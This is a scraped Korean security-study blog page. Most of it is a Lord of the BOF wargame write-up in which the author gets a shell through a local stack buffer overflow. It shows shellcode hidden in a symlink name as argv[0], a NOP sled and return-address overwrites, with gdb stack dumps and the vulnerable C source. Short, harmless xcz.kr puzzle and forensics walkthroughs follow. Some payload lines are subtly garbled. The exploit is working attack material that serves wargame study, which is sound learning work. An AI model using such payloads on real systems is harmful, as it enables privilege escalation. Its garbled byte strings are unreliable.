0xbffffba8: 0x00000000 0x00000000 0x69000000 0x00363836

0xbffffbb8: 0x11eb2f2e 0xb1c9315e 0x0e6c8032 0xe98001ff

0xbffffbc8: 0xebf67501 0xffeae805 0xc132ffff 0x30306951

0xbffffbd8: 0x30696974 0x8a6f6a63 0x8a5451e4 0x0cb19ae2

0xbffffbe8: 0x000081ce 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

[1] address check: bffffac4

[3] address check: bffffac4

????????????????????????????????????????????뫈

bash$ quit

sh: quit: command not found

bash$ exit

exit

[orge@localhost orge]$ ln -s ./troll `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

ln: ?^12l?u楕凹2핽i00tii0cjo??T??

귁?: File exists

[orge@localhost orge]$ rm ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[orge@localhost orge]$ ln -s ./troll `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[orge@localhost orge]$ ././`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

Segmentation fault

[orge@localhost orge]$ ././`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xbㅁ\xfb\xff\xbf"'`

stack is still your friend.

[orge@localhost orge]$ ././`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xba\xfb\xffb\xff\xbf"'`

????????????????????????????????????????????빛

Segmentation fault

[orge@localhost orge]$ ././`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

Segmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

bash$ my-pass

euid = 508

login: orge

Password:

Last login: Fri Dec 13 09:58:07 from 192.168.0.1

[orge@localhost orge]$ ls

core

trall

trall.c

troll

troll.c

[orge@localhost orge]$ ln -s ./trall `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x3\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` //심볼릭링크 생성.

[orge@localhost orge]$ cat trall.c

/*

The Lord of the BOF : The Fellowship of the BOF

- troll

- check argc + argv hunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

// here is changed

if(argc != 2){

printf("argc must be two!\n");

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// one more!

memset(argv[1], 0, strlen(argv[1])); /argv[1] 0으로 초기화, 고로 argv[0]에다가 넣어야함

}

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭

Segmentation fault (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xf5\xfa\xff\xbf"'`

????????????????????????????????????????????衝

Illegal instruction (core dumped)

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xc4\xfa\xff\xbf"'`

????????????????????????????????????????????퀭 //하도 안되서 gdb로 코어를 뜯어보기로 했습니다.

Segmentation fault (core dumped)

[orge@localhost orge]$ gdb -q trall core

warning: core file may not match specified executable file.

Core was generated by `./?^12l?u楕凹2핽i00tii0cjo??T??

귁? '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...Xshelldone.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbffffac9 in ?? ()

(gdb) x/50wx $esp

0xbffffa80: 0x00000000 0xbffffac4 0xbffffad0 0x40013868

0xbffffa90: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffaa0: 0x08048500 0x00000002 0xbffffac4 0x08048390

0xbffffab0: 0x080486ac 0x4000ae60 0xbffffabc 0x40013e90

0xbffffac0: 0x00000002 0xbffffbb8 0xbffffbeb 0x00000000

0xbffffad0: 0xbffffc1c 0xbffffc2b 0xbffffc42 0xbffffc61

0xbffffae0: 0xbffffc83 0xbffffc8d 0xbffffe50 0xbffffe6f

0xbffffaf0: 0xbffffe89 0xbffffe9e 0xbffffeba 0xbffffec5

0xbffffb00: 0xbffffedd 0xbffffeea 0xbffffef2 0xbffffefc

0xbffffb10: 0xbfffff0c 0xbfffff1a 0xbfffff28 0xbfffff39

0xbffffb20: 0xbfffff44 0xbfffff54 0xbfffff94 0x00000000

0xbffffb30: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb40: 0x00000005 0x00000006

(gdb)

0xbffffb48: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffb58: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffb68: 0x0000000b 0x000001fb 0x0000000c 0x000001fb

0xbffffb78: 0x0000000d 0x000001fb 0x0000000e 0x000001fb

0xbffffb88: 0x00000010 0x0febfbff 0x0000000f 0xbffffbb3

0xbffffb98: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffba8: 0x00000000 0x00000000 0x69000000 0x00363836

0xbffffbb8: 0x11eb2f2e 0xb1c9315 0x0e6c8032 0xe98001ff

0xbffffbc8:0xebf67501 0xffeae805 0xc132ffff 0x30306951

0xbffffbd8:0x30696974 0x8a6f6a63 0x8a5451e4 0x0cb19ae2

0xbffffbe8:0x000081ce 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000

(gdb) quit

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

bash$ quit

sh: quit: command not found

bash$ exit

exit

[orge@localhost orge]$ ././`perl -e 'print //여기서 길이때문에 안되는거였슴다. 크흡..

"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

Segmentation fault

[orge@localhost orge]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\x90"x44, "\xb8\xfb\xff\xbf"'`

????????????????????????????????????????????뫈

bash$ my-pass

euid = 508

근데 일부러 'argv[0]주소가 바뀌나??? 에이 설마' 그러면서도 긴가민가해서 argv[0]의 주소를 체크하는 코드를 쭉 넣었는데, 왜 그 코드의 결과와 실제 argv[0]이 있던 장소가 다른건지는 모르겠어요. 누구 말씀해주실분...

컴이 버벅거려서 글이 더 써지지 않네요. 타자를 빨리치면 글자가 띄엄띄엄;; ㅠㅠ

NOTES(빡침주의)

arcg=전달되는 인자의 단어수

멤셋이 근데 argv[1]에 되어있는데 3에 넣지도 못하고 어떡하지

-심볼릭링크이용

-파일을 가르키고 있는 파일이라고 한다 포인터같은건가;; 아님 환경변수같은건가

심볼릭링크를 쓰면 스택은 니친구야! 라고 뜬다 아빡쳐

\x2f때문이라고한다

음 그렇다면 페이로드

argv0으로 쉘코드넣고(심볼릭링크) argv0의 주소를 얻어내고 그 후 argv1로 bf를 인증한다. 그다음에 argv의 nopsled를 이용해 타고내려간다! 근데 없쪙! argv0의 주소를 알아내고 바로가는수밖에!

argv 1로 44바이트는 쓰레기값으로 채우고 그 후에 리턴어드레스를 넣으면..되나?

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

vampire->skeleton (2)	2014.02.25
troll->vampire (0)	2013.12.22
darkelf->orge (0)	2013.11.22
wolfman->darkelf (0)	2013.11.21
orc->wolfman (0)	2013.11.21

풀이 ㄱㄱㅆ~

자 이제 가봅시다.

29번 문제입니다. 트리비아ㅋㅋ

열면 이 사진입니다.

아시는 분도 계시고 모르시는 분도 있겠지만, 저는 이 게임이 뭔지 알아영(한동안 닌텐도 많이 할 때....).
바로,

피크로스지요. 솔직히 말하자면 이 퍼즐이 네모네모 피크로스라고 불리고 있는데 그래서 이 문제 제목도 NemoNemo 같습니다ㅋㅋ

2007년 나왔네요. 저는 한 2009년쯤에 열씌미 저 게임을 했었죠,,

저거 재밌어여 그리고 음 꽤나 빡침;;

근데 이 퍼즐은 대회에서도 가끔 나오니 알아두시는게 좋을듯 합니다.

http://blog.naver.com/PostView.nhn?blogId=takgi&logNo=100112988825

여기에 설명이 있으니 읽어보세요. 물론, 구글에 쳐도 많이 나오구요.

암튼, 요즘세상은 좋으니까 풀어주는 프로그램도 있을 것 같습니다.

네, 있습니다.

저기 화살표 있는걸로 들어갑시다.

다운로드는 저 초록버튼이구, 저기 화살표 가리키고 있는 글도, 읽어봐요 한번. 흠 제 기억으로는 저기서 도움을 얻은것같은데 잘 기억은 안나네요.

여기서부턴 혼자 하셔도 될듯합니다. 저도 혼자 할 수 있었으니 여러분도 쉽게 하실 수 있으실껍니다.

노가다가 조금 필요하긴 하지만 풀립니다.

저작자표시

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 22 (0)	2013.11.28
xcz.kr Prob 20 (0)	2013.11.28
xcz.kr Prob 17 (0)	2013.11.28
xcz.kr Prob 14 (0)	2013.11.28
xcz.kr Prob 11 (3)	2013.11.28

이번에 풀이할 문제는 22번, 포렌식 문제입니다.

파일을 다운받읍시다.

어,. 확장자가 없네요. 제가 이부분에서 정말 헤맸습니다. 그러다가 정보보안가님이 "어 그거 확장자 해주셔야 열리는거... 아시죠?" 하셔서 아차..싶었어요.

다운받은 후, 우선은 파일의 확장자를 .AD1으로 만듭니다. 이게 어.. ftk의 이미지 마운트한 파일 확장자였나? 그래요.

그 이유는, 우선 파일을 메모장으로 열어보면

ADSEGMENTEDFILE이란 문자열과 ADLOGICALIMAGE이란 문자열이 보입니다.

네이버에서 검색하면, http://blog.naver.com/trfwodnr?Redirect=Log&logNo=50153990890

여기에 정보가 있습니다. Ftk imager로 AD1덤프를 뜨면 나오는 헤더라고 하네요.

그런 후, ftk imager를 열고,

file -> evidence item -> image file 로 하여 파일을 엽니다.

그중 파일을 훑다보면, 이런 파일이 나옵니다.

지금 저희는 노트북 주인의 위치가 필요하니, 훑다보면 어!! 하는 파일이 있을겁니다.

lat=latitude lon=longitude, gps. 모두 장소에 연관된 단어들이죠?

이 파일을 오른쪽 클릭+Export files 로 저장해놓읍시다.
그렇다면 구글에 GPS ROUTE EDITOR을 쳐서 프로그램을 다운받은 후, 프로그램에 알맞은 확장자(뭐였는지 기억은 안나네요)로 바꿔 열어봅니다.

하지만, 좀 경로가 애매한게 있는데, 저는 관리자님께 물어봤지만 그건 xcz.kr 페이스북 페이지에 들어가셔서 여쭈어보시면 됩니다.

이상입니다. :)

저작자표시

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 29 (2)	2013.11.28
xcz.kr Prob 20 (0)	2013.11.28
xcz.kr Prob 17 (0)	2013.11.28
xcz.kr Prob 14 (0)	2013.11.28
xcz.kr Prob 11 (3)	2013.11.28

20번, 보너스 문제 풀이입니다.

뽀나쓰 문제라 배점도 50점,..ㅇㅅㅇ

사진을 다운받습니다.

그러고 우선은 최고의 툴인 메모장으로 사진을 열어봅니다.

별거 없네요,
저는 사진을 winhex/메모장 -> 속성 -> Nixon ViewNX2 이 순서로 보기때문에 메모장으로 연 후, 별다른게 없으니 속성을 열었습니다.

끝. 탭들을 열다보면 키값이 나옵니다.

저작자표시

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 29 (2)	2013.11.28
xcz.kr Prob 22 (0)	2013.11.28
xcz.kr Prob 17 (0)	2013.11.28
xcz.kr Prob 14 (0)	2013.11.28
xcz.kr Prob 11 (3)	2013.11.28

EverTokki

STUDY

skeleton->golem

'STUDY > Lord of the BOF' 카테고리의 다른 글

MISCCCCCCCCCC!

'STUDY > Documentation' 카테고리의 다른 글

vampire->skeleton

'STUDY > Lord of the BOF' 카테고리의 다른 글

troll->vampire

'STUDY > Lord of the BOF' 카테고리의 다른 글

orge->troll

'STUDY > Lord of the BOF' 카테고리의 다른 글

xcz.kr Prob 29

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 22

'STUDY > xcz.kr' 카테고리의 다른 글

xcz.kr Prob 20

'STUDY > xcz.kr' 카테고리의 다른 글

+ Recent posts

티스토리툴바